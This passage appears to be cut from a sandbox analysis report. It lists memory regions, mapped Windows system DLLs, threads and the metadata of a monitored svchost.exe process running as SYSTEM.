filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 676
start_va = 0x1b0000
end_va = 0x1b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 677
start_va = 0x7ffa13b70000
end_va = 0x7ffa13cb2fff
monitored = 0
entry_point = 0x7ffa13b98210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 680
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 681
start_va = 0x7ffa141e0000
end_va = 0x7ffa1421afff
monitored = 0
entry_point = 0x7ffa141e12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 682
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 683
start_va = 0x7ffa11220000
end_va = 0x7ffa113a5fff
monitored = 0
entry_point = 0x7ffa1126d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 686
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 687
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 688
start_va = 0x860000
end_va = 0x9e7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000860000"
filename = ""
Region:
id = 689
start_va = 0x9f0000
end_va = 0xb70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009f0000"
filename = ""
Region:
id = 690
start_va = 0xb80000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b80000"
filename = ""
Region:
id = 691
start_va = 0x600000
end_va = 0x68ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 692
start_va = 0x760000
end_va = 0x85ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000760000"
filename = ""
Region:
id = 695
start_va = 0x600000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 696
start_va = 0x680000
end_va = 0x68ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 697
start_va = 0x7ffa15210000
end_va = 0x7ffa1676efff
monitored = 0
entry_point = 0x7ffa153711f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 698
start_va = 0x7ffa13390000
end_va = 0x7ffa133d2fff
monitored = 0
entry_point = 0x7ffa133a4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 699
start_va = 0x7ffa13520000
end_va = 0x7ffa13b63fff
monitored = 0
entry_point = 0x7ffa136e64b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 700
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 701
start_va = 0x7ffa14ba0000
end_va = 0x7ffa14bf1fff
monitored = 0
entry_point = 0x7ffa14baf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 702
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 703
start_va = 0x7ffa12e80000
end_va = 0x7ffa12f34fff
monitored = 0
entry_point = 0x7ffa12ec22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 704
start_va = 0x7ffa12dc0000
end_va = 0x7ffa12e0afff
monitored = 0
entry_point = 0x7ffa12dc35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 705
start_va = 0x7ffa12d90000
end_va = 0x7ffa12da3fff
monitored = 0
entry_point = 0x7ffa12d952e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 709
start_va = 0x7ffa11710000
end_va = 0x7ffa117a5fff
monitored = 0
entry_point = 0x7ffa11735570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 710
start_va = 0x1f80000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 713
start_va = 0x2100000
end_va = 0x2436fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 714
start_va = 0x2440000
end_va = 0x2650fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002440000"
filename = ""
Region:
id = 715
start_va = 0x2660000
end_va = 0x2871fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 716
start_va = 0x1f80000
end_va = 0x2091fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 717
start_va = 0x20f0000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020f0000"
filename = ""
Region:
id = 718
start_va = 0x2880000
end_va = 0x2a93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 719
start_va = 0x2aa0000
end_va = 0x2bacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002aa0000"
filename = ""
Region:
id = 724
start_va = 0x640000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 725
start_va = 0x7ffa14a40000
end_va = 0x7ffa14b99fff
monitored = 0
entry_point = 0x7ffa14a838e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 726
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 727
start_va = 0x690000
end_va = 0x74bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 728
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 729
start_va = 0x7ffa10610000
end_va = 0x7ffa10631fff
monitored = 0
entry_point = 0x7ffa10611a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 736
start_va = 0x7ffa11410000
end_va = 0x7ffa11422fff
monitored = 0
entry_point = 0x7ffa11412760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 737
start_va = 0x7ffa12ba0000
end_va = 0x7ffa12bf5fff
monitored = 0
entry_point = 0x7ffa12bb0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 738
start_va = 0x60000
end_va = 0x66fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 739
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 740
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 741
start_va = 0x1e0000
end_va = 0x1e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 743
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "conhostv2.dll.mui"
filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")
Region:
id = 744
start_va = 0x750000
end_va = 0x751fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000750000"
filename = ""
Region:
id = 745
start_va = 0x7ffa080f0000
end_va = 0x7ffa08363fff
monitored = 0
entry_point = 0x7ffa08160400
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")
Region:
id = 746
start_va = 0x20a0000
end_va = 0x20a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 747
start_va = 0x20b0000
end_va = 0x20b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000020b0000"
filename = ""
Thread:
id = 18
os_tid = 0x1240
Thread:
id = 19
os_tid = 0x123c
Thread:
id = 20
os_tid = 0x1238
Thread:
id = 22
os_tid = 0x1234
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x75956000"
os_pid = "0x360"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "3"
os_parent_pid = "0x214"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 839
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 840
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 841
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 842
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 843
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 844
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 845
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 846
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 847
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 848
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 849
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 850
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 851
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 852
start_va = 0x400000
end_va = 0x400fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 853
start_va = 0x410000
end_va = 0x410fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000410000"
filename = ""
Region:
id = 854
start_va = 0x420000
end_va = 0x421fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "dosvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui")
Region:
id = 855
start_va = 0x450000
end_va = 0x454fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")
Region:
id = 856
start_va = 0x460000
end_va = 0x46ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")
Region:
id = 857
start_va = 0x470000
end_va = 0x472fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mswsock.dll.mui"
filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui")
Region:
id = 858
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 859
start_va = 0x540000
end_va = 0x546fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 860
start_va = 0x550000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 861
start_va = 0x5d0000
end_va = 0x5d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 862
start_va = 0x5f0000
end_va = 0x5f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 863
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 864
start_va = 0x700000
end_va = 0x887fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 865
start_va = 0x890000
end_va = 0x890fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 866
start_va = 0x8a0000
end_va = 0x8a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008a0000"
filename = ""
Region:
id = 867
start_va = 0x8b0000
end_va = 0x8bcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 868
start_va = 0x8c0000
end_va = 0x8c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Region:
id = 869
start_va = 0x8d0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "crypt32.dll.mui"
filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")
Region:
id = 870
start_va = 0x8e0000
end_va = 0x8e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 871
start_va = 0x8f0000
end_va = 0x8f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 872
start_va = 0x900000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 873
start_va = 0xa00000
end_va = 0xb80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a00000"
filename = ""
Region:
id = 874
start_va = 0xb90000
end_va = 0xc8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 875
start_va = 0xc90000
end_va = 0xc93fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 876
start_va = 0xca0000
end_va = 0xcb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 877
start_va = 0xcc0000
end_va = 0xcc6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cc0000"
filename = ""
Region:
id = 878
start_va = 0xcd0000
end_va = 0xd14fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")
Region:
id = 879
start_va = 0xd20000
end_va = 0xd2cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "iphlpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui")
Region:
id = 880
start_va = 0xd30000
end_va = 0xd36fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d30000"
filename = ""
Region:
id = 881
start_va = 0xdc0000
end_va = 0xdc8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 882
start_va = 0xdd0000
end_va = 0xdd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 883
start_va = 0xde0000
end_va = 0xde1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "activeds.dll.mui"
filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")
Region:
id = 884
start_va = 0xdf0000
end_va = 0xdf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000df0000"
filename = ""
Region:
id = 885
start_va = 0xe00000
end_va = 0xefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 886
start_va = 0xf00000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 887
start_va = 0x1000000
end_va = 0x1336fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 888
start_va = 0x1340000
end_va = 0x143ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001340000"
filename = ""
Region:
id = 889
start_va = 0x1440000
end_va = 0x153ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001440000"
filename = ""
Region:
id = 890
start_va = 0x1540000
end_va = 0x15bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001540000"
filename = ""
Region:
id = 891
start_va = 0x15c0000
end_va = 0x15c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000015c0000"
filename = ""
Region:
id = 892
start_va = 0x15d0000
end_va = 0x15e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1256.nls"
filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls")
Region:
id = 893
start_va = 0x15f0000
end_va = 0x15f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "usocore.dll.mui"
filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")
Region:
id = 894
start_va = 0x1600000
end_va = 0x16fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 895
start_va = 0x1700000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 896
start_va = 0x1800000
end_va = 0x18dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 897
start_va = 0x18e0000
end_va = 0x18f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1251.nls"
filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")
Region:
id = 898
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 899
start_va = 0x1a00000
end_va = 0x1a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 900
start_va = 0x1a80000
end_va = 0x1b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a80000"
filename = ""
Region:
id = 901
start_va = 0x1b80000
end_va = 0x1c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b80000"
filename = ""
Region:
id = 902
start_va = 0x1c80000
end_va = 0x1d7ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c80000"
filename = ""
Region:
id = 903
start_va = 0x1d80000
end_va = 0x1e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d80000"
filename = ""
Region:
id = 904
start_va = 0x1e80000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e80000"
filename = ""
Region:
id = 905
start_va = 0x1f80000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 906
start_va = 0x2080000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002080000"
filename = ""
Region:
id = 907
start_va = 0x2180000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 908
start_va = 0x2280000
end_va = 0x237ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 909
start_va = 0x2380000
end_va = 0x247ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 910
start_va = 0x2480000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 911
start_va = 0x2500000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 912
start_va = 0x2600000
end_va = 0x26fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 913
start_va = 0x2700000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 914
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 915
start_va = 0x2900000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 916
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 917
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 918
start_va = 0x2c00000
end_va = 0x2c8dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 919
start_va = 0x2c90000
end_va = 0x2d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c90000"
filename = ""
Region:
id = 920
start_va = 0x2d10000
end_va = 0x2e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d10000"
filename = ""
Region:
id = 921
start_va = 0x2e10000
end_va = 0x2f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e10000"
filename = ""
Region:
id = 922
start_va = 0x2f10000
end_va = 0x2f11fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002f10000"
filename = ""
Region:
id = 923
start_va = 0x2f60000
end_va = 0x2fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f60000"
filename = ""
Region:
id = 924
start_va = 0x3090000
end_va = 0x310ffff
monitored = 1
